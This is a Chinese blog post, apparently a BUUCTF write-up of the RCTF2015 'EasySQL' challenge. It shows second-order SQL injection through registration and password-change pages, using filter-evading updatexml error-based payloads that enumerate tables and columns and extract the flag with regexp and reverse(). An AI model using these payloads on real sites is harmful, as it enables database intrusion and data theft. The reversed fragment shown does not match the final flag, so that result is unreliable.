[RCTF2015]EasySQL 1

最新推荐文章于 2025-03-26 15:09:28 发布

hcjtn

最新推荐文章于 2025-03-26 15:09:28 发布

阅读量1.6k

点赞数 1

分类专栏： buuctf 文章标签： web安全数据库 mysql

本文链接：https://blog.youkuaiyun.com/m0_62879498/article/details/124895314

版权

buuctf 专栏收录该内容

29 篇文章

订阅专栏

[RCTF2015]EasySQL 1

在这里插入图片描述
进入环境，发现注册页面和登录页面
我们尝试进行注册admin，页面回显用户存在，第一时间就想到了二次注入。
注册 admin"#,登录后更改密码，成功。登录admin ，发现和普通有用户没有区别。

之后就是寻找注入点，只有登陆界面，注册界面和changepwd界面可能存在存在sql注入。

我们知道二次注入主要是插入恶意数据和引用恶意数据。
注册界面主要是进行一个插入数据，肯定需要一个界面进行恶意数据的引用。
我们在注册界面输入恶意数据分别进行尝试
尝试后发现，登录界面只能进行一个登录发所以，我们可以肯定在本关一定需要利用changepwd.php配合进行。

同时在注册页面发现过滤掉了很多字符，像 空格, . ,and,or,union
页面回显 invalid string!

注册用户123"||' 更改密码

123"||'

在这里插入图片描述
发现页面报错，所以在本关我们可以尝试使用报错注入

剩下的就比较常规

查询库名

123"||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#

在这里插入图片描述

爆表名

123"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),0x7e),1))#

在这里插入图片描述

爆列名

123"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1))#

在这里插入图片描述

爆flag

123"||(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e),1))#

在这里插入图片描述
flag
不在这里
爆其他表名

爆users表

123"||(updatexml(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1))#

在这块儿，我没有加 0x7e(~) 加上后反而爆不出来有没有大佬知道这是为什么

regexp 正则表达式匹配由于报错注入的长度限制需要使用正则表达式
那么直接去查 real_flag_1s_here 这一列为xxxxxxxxxxxxxx
由于长度的限制导致
用正则表达式匹配 flag 可以得到一半的 flag

123"||(updatexml(1,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')),1))#

在这里插入图片描述

使用reverse函数将字符逆序输出

123"||(updatexml(1,concat('~',reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

在这里插入图片描述

s= '~}1d5ebc521f44-2f7b-b2a4-63a2-30'
s=s[::-1]
print(s)

)

拼接flag

flag{b68e6065-e226-4a87-9203-779144e092b9}